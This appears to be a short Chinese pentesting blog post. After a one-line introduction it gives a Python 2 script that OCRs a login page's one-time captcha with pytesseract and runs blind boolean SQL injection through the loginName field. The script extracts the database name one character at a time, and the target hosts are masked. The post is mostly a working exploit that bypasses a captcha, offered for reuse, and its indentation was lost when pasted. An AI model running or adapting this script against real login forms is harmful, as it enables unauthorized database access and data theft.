之前做渗透测试的时候有的点验证码一次就失效,但是验证码比较简单,可以自动检测识别出来然后注入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
# -*- coding: utf-8 -*-
from PIL import Image
from pytesseract import *
import requests
import string
ss = string.letters
r = requests.session()
img_url = "http://xxx.xxx.xxx.xxx/common/validImage.jsp"
login_url = "http://xxx.xxx.xxx.xxx/LoginAction.do"
flag = ''
for i in range(1,10):
for s in ss:
payload = "fff' or substr(database(),{0},1)='{1}".format(i,s)
with open("validImage.jsp.jpg",'wb') as wr:
wr.write(r.get(url=img_url).content)
image = Image.open('validImage.jsp.jpg')
code = int(pytesseract.image_to_string(image).replace(" ",""))
#print code
data = {
'actionCase':'login',
'loginName':payload,
'password':'fff',
'validcode':code
}
content = r.post(url=login_url,data=data).text
#print len(content)
if u"登陆密码输入" in content:
#print content
flag += s
print "database:"+flag
break